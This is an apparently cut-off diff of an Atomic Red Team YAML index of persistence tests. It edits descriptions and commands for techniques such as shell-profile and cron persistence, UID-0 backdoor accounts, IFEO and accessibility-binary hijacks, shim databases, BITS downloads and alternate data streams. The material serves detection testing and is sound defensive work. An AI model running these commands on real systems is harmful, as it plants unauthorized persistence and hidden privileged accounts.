|
|
|
@@ -62,7 +62,7 @@ persistence:
|
|
|
|
|
- name: Add command to .bash_profile
|
|
|
|
|
description: 'Adds a command to the .bash_profile file of the current user
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -75,11 +75,11 @@ persistence:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'echo "#{command_to_add}" >> ~/.bash_profile
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Add command to .bashrc
|
|
|
|
|
description: 'Adds a command to the .bashrc file of the current user
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -92,7 +92,7 @@ persistence:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'echo "#{command_to_add}" >> ~/.bashrc
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1015:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -178,7 +178,7 @@ persistence:
|
|
|
|
|
description: 'Comma separated list of system binaries to which you want
|
|
|
|
|
to attach each #{attached_process}. Default: "osk.exe"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
type: String
|
|
|
|
|
default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe,
|
|
|
|
|
atbroker.exe
|
|
|
|
@@ -186,7 +186,7 @@ persistence:
|
|
|
|
|
description: 'Full path to process to attach to target in #{parent_list}.
|
|
|
|
|
Default: cmd.exe
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
type: Path
|
|
|
|
|
default: C:\windows\system32\cmd.exe
|
|
|
|
|
executor:
|
|
|
|
@@ -303,7 +303,7 @@ persistence:
|
|
|
|
|
- name: Admin Account Manipulate
|
|
|
|
|
description: 'Manipulate Admin Account Name
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -522,7 +522,7 @@ persistence:
|
|
|
|
|
description: 'AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs
|
|
|
|
|
to be loaded into each user mode process on the system
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -535,7 +535,7 @@ persistence:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'reg.exe import #{registry_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1138:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -614,11 +614,8 @@ persistence:
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Application Shim Installation
|
|
|
|
|
description: |
|
|
|
|
|
To test injecting DLL into a custom application
|
|
|
|
|
you need to copy AtomicShim.dll Into C:\Tools
|
|
|
|
|
As well as Compile the custom app.
|
|
|
|
|
We believe observing the shim install is a good
|
|
|
|
|
place to start.
|
|
|
|
|
Install a shim database. This technique is used for privelage escalation and bypassing user access control. Upon execution, "Installation of AtomicShim complete."
|
|
|
|
|
will be displayed.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -636,13 +633,17 @@ persistence:
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: |
|
|
|
|
|
sdbinst.exe #{file_path}
|
|
|
|
|
sdbinst.exe -u #{file_path}
|
|
|
|
|
- name: New shim database files created in the default shim database directory
|
|
|
|
|
description: 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
|
|
|
|
|
command: 'sdbinst.exe #{file_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'sdbinst.exe -u #{file_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: New shim database files created in the default shim database directory
|
|
|
|
|
description: |
|
|
|
|
|
Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database
|
|
|
|
|
|
|
|
|
|
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -655,9 +656,11 @@ persistence:
|
|
|
|
|
Remove-Item C:\Windows\apppatch\Custom\T1138CompatDatabase.sdb -ErrorAction Ignore
|
|
|
|
|
Remove-Item C:\Windows\apppatch\Custom\Custom64\T1138CompatDatabase.sdb -ErrorAction Ignore
|
|
|
|
|
- name: Registry key creation and/or modification events for SDB
|
|
|
|
|
description: 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
|
|
|
|
|
description: |
|
|
|
|
|
Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing
|
|
|
|
|
the registry keys that were created. These keys can also be viewed using the Registry Editor.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -772,10 +775,10 @@ persistence:
|
|
|
|
|
command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file}
|
|
|
|
|
#{local_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del #{local_file} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Bitsadmin Download (PowerShell)
|
|
|
|
|
description: |
|
|
|
|
|
This test simulates an adversary leveraging bitsadmin.exe to download
|
|
|
|
@@ -798,10 +801,10 @@ persistence:
|
|
|
|
|
command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination
|
|
|
|
|
#{local_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Persist, Download, & Execute
|
|
|
|
|
description: |
|
|
|
|
|
This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer
|
|
|
|
@@ -949,7 +952,7 @@ persistence:
|
|
|
|
|
- name: Firefox
|
|
|
|
|
description: 'Create a file called test.wma, with the duration of 30 seconds
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- windows
|
|
|
|
@@ -1052,10 +1055,10 @@ persistence:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'assoc #{extension_to_change}=#{target_extension_handler}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'assoc .hta=htafile
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1136:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -1128,7 +1131,7 @@ persistence:
|
|
|
|
|
- name: Create a user account on a Linux system
|
|
|
|
|
description: 'Create a user via useradd
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -1141,14 +1144,14 @@ persistence:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'useradd -M -N -r -s /bin/bash -c evil_account #{username}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'userdel #{username}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Create a user account on a MacOS system
|
|
|
|
|
description: 'Creates a user on a MacOS system with dscl
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -1172,11 +1175,11 @@ persistence:
|
|
|
|
|
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
|
|
|
|
|
cleanup_command: 'dscl . -delete /Users/#{username}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Create a new user in a command prompt
|
|
|
|
|
description: 'Creates a new user in a command prompt
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Creates a new user in a command prompt. Upon execution, "The command completed successfully." will be displayed. To verify the
|
|
|
|
|
new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136_CMD"
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -1193,14 +1196,14 @@ persistence:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'net user /add "#{username}" "#{password}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'net user /del "#{username}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Create a new user in PowerShell
|
|
|
|
|
description: 'Creates a new user in PowerShell
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Creates a new user in PowerShell. Upon execution, details about the new account will be displayed in the powershell session. To verify the
|
|
|
|
|
new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136_PowerShell"
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -1213,15 +1216,15 @@ persistence:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'New-LocalUser -Name "#{username}" -NoPassword
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Create a new user in Linux with `root` UID and GID.
|
|
|
|
|
description: 'Creates a new user in Linux and adds the user to the `root` group.
|
|
|
|
|
This technique was used by adversaries during the Butter attack campaign.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -1239,7 +1242,9 @@ persistence:
|
|
|
|
|
command: |
|
|
|
|
|
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username}
|
|
|
|
|
echo "#{password}" | passwd --stdin #{username}
|
|
|
|
|
cleanup_command: 'userdel #{username}'
|
|
|
|
|
cleanup_command: 'userdel #{username}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
T1038:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -1413,7 +1418,7 @@ persistence:
|
|
|
|
|
description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor)
|
|
|
|
|
daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -1585,7 +1590,7 @@ persistence:
|
|
|
|
|
- name: Create a hidden file in a hidden directory
|
|
|
|
|
description: 'Creates a hidden file inside a hidden directory
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -1597,11 +1602,11 @@ persistence:
|
|
|
|
|
echo "T1158" > /var/tmp/.hidden-directory/.hidden-file
|
|
|
|
|
cleanup_command: 'rm -rf /var/tmp/.hidden-directory/
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Mac Hidden file
|
|
|
|
|
description: 'Hide a file on MacOS
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -1610,42 +1615,61 @@ persistence:
|
|
|
|
|
command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00
|
|
|
|
|
40 00 FF FF FF FF 00 00"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Create Windows System File with Attrib
|
|
|
|
|
description: 'Creates a file and marks it as a system file using the attrib.exe
|
|
|
|
|
utility.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Creates a file and marks it as a system file using the attrib.exe utility. Upon execution, open the file in file explorer then open Properties > Details
|
|
|
|
|
and observe that the Attributes are "SA" for System and Archive.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_to_modify:
|
|
|
|
|
description: File to modify using Attrib command
|
|
|
|
|
type: string
|
|
|
|
|
default: "%temp%\\T1158.txt"
|
|
|
|
|
dependency_executor_name: command_prompt
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: The file must exist on disk at specified location (#{file_to_modify})
|
|
|
|
|
prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )'
|
|
|
|
|
get_prereq_command: 'echo system_Attrib_T1158 >> #{file_to_modify}'
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: |
|
|
|
|
|
echo T1158 > %TEMP%\T1158.txt
|
|
|
|
|
attrib.exe +s %TEMP%\T1158.txt
|
|
|
|
|
cleanup_command: 'del /A:S %TEMP%\T1158.txt >nul 2>&1
|
|
|
|
|
command: 'attrib.exe +s #{file_to_modify}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del /A:S #{file_to_modify} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Create Windows Hidden File with Attrib
|
|
|
|
|
description: 'Creates a file and marks it as hidden using the attrib.exe utility.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Creates a file and marks it as hidden using the attrib.exe utility.Upon execution, open File Epxplorer and enable View > Hidden Items. Then, open Properties > Details on the file
|
|
|
|
|
and observe that the Attributes are "SH" for System and Hidden.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_to_modify:
|
|
|
|
|
description: File to modify using Attrib command
|
|
|
|
|
type: string
|
|
|
|
|
default: "%temp%\\T1158.txt"
|
|
|
|
|
dependency_executor_name: command_prompt
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: The file must exist on disk at specified location (#{file_to_modify})
|
|
|
|
|
prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )'
|
|
|
|
|
get_prereq_command: 'echo system_Attrib_T1158 >> #{file_to_modify}'
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
echo T1158_hidden > %TEMP%\T1158_hidden.txt
|
|
|
|
|
attrib.exe +h %TEMP%\T1158_hidden.txt
|
|
|
|
|
cleanup_command: 'del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'attrib.exe +h #{file_to_modify}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del /A:H #{file_to_modify} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Hidden files
|
|
|
|
|
description: 'Requires Apple Dev Tools
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -1658,11 +1682,11 @@ persistence:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'setfile -a V #{filename}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Hide a Directory
|
|
|
|
|
description: 'Hide a directory on MacOS
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -1673,11 +1697,11 @@ persistence:
|
|
|
|
|
chflags hidden /var/tmp/T1158_mac.txt
|
|
|
|
|
cleanup_command: 'rm /var/tmp/T1158_mac.txt
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Show all hidden files
|
|
|
|
|
description: 'Show all hidden files on MacOS
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -1685,52 +1709,59 @@ persistence:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'defaults write com.apple.finder AppleShowAllFiles YES
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Create ADS command prompt
|
|
|
|
|
description: 'Create an Alternate Data Stream with the command prompt. Write
|
|
|
|
|
access is required.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Create an Alternate Data Stream with the command prompt. Write access is required. Upon execution, run "dir /a-d /s /r | find ":$DATA"" in the %temp%
|
|
|
|
|
folder to view that the alternate data stream exists. To view the data in the alternate data stream, run "notepad T1158_has_ads.txt:adstest.txt"
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_name:
|
|
|
|
|
description: File name of file to create ADS on.
|
|
|
|
|
type: string
|
|
|
|
|
default: test.txt
|
|
|
|
|
default: "%temp%\\T1158_has_ads_cmd.txt"
|
|
|
|
|
ads_filename:
|
|
|
|
|
description: Name of ADS file.
|
|
|
|
|
type: string
|
|
|
|
|
default: adstest.txt
|
|
|
|
|
dependency_executor_name: command_prompt
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: The file must exist on disk at specified location (#{file_name})
|
|
|
|
|
prereq_command: 'IF EXIST #{file_name} ( EXIT 0 ) ELSE ( EXIT 1 )'
|
|
|
|
|
get_prereq_command: 'echo normal_text >> #{file_name} >nul 2>&1'
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
echo "Normal Text." > #{file_name}
|
|
|
|
|
echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename}
|
|
|
|
|
for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
|
|
|
|
|
for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
|
|
|
|
|
cleanup_command: 'del #{file_name} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Create ADS PowerShell
|
|
|
|
|
description: 'Create an Alternate Data Stream with PowerShell. Write access
|
|
|
|
|
is required.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, the the command "ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname"
|
|
|
|
|
in the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1158_has_ads_powershell.txt:adstest.txt" in the %temp% folder.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
file_name:
|
|
|
|
|
description: File name of file to create ADS on.
|
|
|
|
|
type: string
|
|
|
|
|
default: test.txt
|
|
|
|
|
default: "$env:TEMP\\T1158_has_ads_powershell.txt"
|
|
|
|
|
ads_filename:
|
|
|
|
|
description: Name of ADS file.
|
|
|
|
|
type: string
|
|
|
|
|
default: adstest.txt
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: The file must exist on disk at specified location (#{file_name})
|
|
|
|
|
prereq_command: 'if (Test-Path #{file_name}) { exit 0 } else { exit 1 }'
|
|
|
|
|
get_prereq_command: 'New-Item -Path #{file_name} | Out-Null'
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
@@ -1738,10 +1769,9 @@ persistence:
|
|
|
|
|
echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test"
|
|
|
|
|
set-content -path #{file_name} -stream #{ads_filename} -value "test2"
|
|
|
|
|
set-content -path . -stream #{ads_filename} -value "test3"
|
|
|
|
|
ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname
|
|
|
|
|
cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1179:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -1871,7 +1901,7 @@ persistence:
|
|
|
|
|
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
|
|
|
|
|
description: 'Hooks functions in PowerShell to read TLS Communications
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -2071,7 +2101,7 @@ persistence:
|
|
|
|
|
- name: IFEO Add Debugger
|
|
|
|
|
description: 'Leverage Global Flags Settings
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -2089,15 +2119,15 @@ persistence:
|
|
|
|
|
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
|
|
|
|
|
File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
|
|
|
|
|
File Execution Options\#{target_binary}" /v Debugger /f
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: IFEO Global Flags
|
|
|
|
|
description: 'Leverage Global Flags Settings
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -2225,7 +2255,7 @@ persistence:
|
|
|
|
|
description: 'This test uses the insmod command to load a kernel module for
|
|
|
|
|
Linux.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -2242,10 +2272,10 @@ persistence:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'insmod #{kernel_module_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'rmmod #{module_name}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1159:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -2330,7 +2360,7 @@ persistence:
|
|
|
|
|
- name: Launch Agent
|
|
|
|
|
description: 'Create a plist and execute it
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -2432,7 +2462,7 @@ persistence:
|
|
|
|
|
- name: Launch Daemon
|
|
|
|
|
description: 'Utilize LaunchDaemon to launch `Hello World`
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -2516,14 +2546,14 @@ persistence:
|
|
|
|
|
- name: Launchctl
|
|
|
|
|
description: 'Utilize launchctl
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
|
name: sh
|
|
|
|
|
command: 'launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1168:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -2611,7 +2641,7 @@ persistence:
|
|
|
|
|
of the referenced file. This technique was used by numerous IoT automated
|
|
|
|
|
exploitation attacks.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -2628,13 +2658,13 @@ persistence:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Cron - Add script to cron folder
|
|
|
|
|
description: 'This test adds a script to a cron folder configured to execute
|
|
|
|
|
on a schedule. This technique was used by the threat actor Rocke during the
|
|
|
|
|
exploitation of Linux web servers.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -2651,7 +2681,7 @@ persistence:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'echo "#{command}" > /etc/cron.daily/#{cron_script_name}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Event Monitor Daemon Persistence
|
|
|
|
|
description: "This test adds persistence via a plist to execute via the macOS
|
|
|
|
|
Event Monitor Daemon. \n"
|
|
|
|
@@ -2753,17 +2783,16 @@ persistence:
|
|
|
|
|
identifier: T1037
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Logon Scripts
|
|
|
|
|
description: 'Adds a registry value to run batch script created in the C:\Windows\Temp
|
|
|
|
|
directory.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key
|
|
|
|
|
that can be viewed in the Registry Editor.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
script_path:
|
|
|
|
|
description: Path to .bat file
|
|
|
|
|
type: String
|
|
|
|
|
default: "$env:SystemRoot\\Temp\\art.bat"
|
|
|
|
|
default: "%temp%\\art.bat"
|
|
|
|
|
script_command:
|
|
|
|
|
description: Command To Execute
|
|
|
|
|
type: String
|
|
|
|
@@ -2772,16 +2801,16 @@ persistence:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: |
|
|
|
|
|
echo cmd /c "#{script_command}" > #{script_path}
|
|
|
|
|
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}"
|
|
|
|
|
echo "#{script_command}" > #{script_path}
|
|
|
|
|
REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f
|
|
|
|
|
cleanup_command: |
|
|
|
|
|
REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f
|
|
|
|
|
del #{script_path} >nul 2>nul
|
|
|
|
|
del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>nul
|
|
|
|
|
del #{script_path} >nul 2>&1
|
|
|
|
|
del "%USERPROFILE%\desktop\T1037-log.txt" >nul 2>&1
|
|
|
|
|
- name: Scheduled Task Startup Script
|
|
|
|
|
description: 'Run an exe on user logon or system startup
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view
|
|
|
|
|
the tasks, open the Task Scheduler and look in the Active Tasks pane.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -2796,7 +2825,7 @@ persistence:
|
|
|
|
|
- name: Logon Scripts - Mac
|
|
|
|
|
description: 'Mac logon script
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -2809,10 +2838,11 @@ persistence:
|
|
|
|
|
Populate the plist with the location of your shell script\n\n\t defaults
|
|
|
|
|
write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n"
|
|
|
|
|
- name: Supicious vbs file run from startup Folder
|
|
|
|
|
description: 'vbs files can be placed in and ran from the startup folder to
|
|
|
|
|
maintain persistance
|
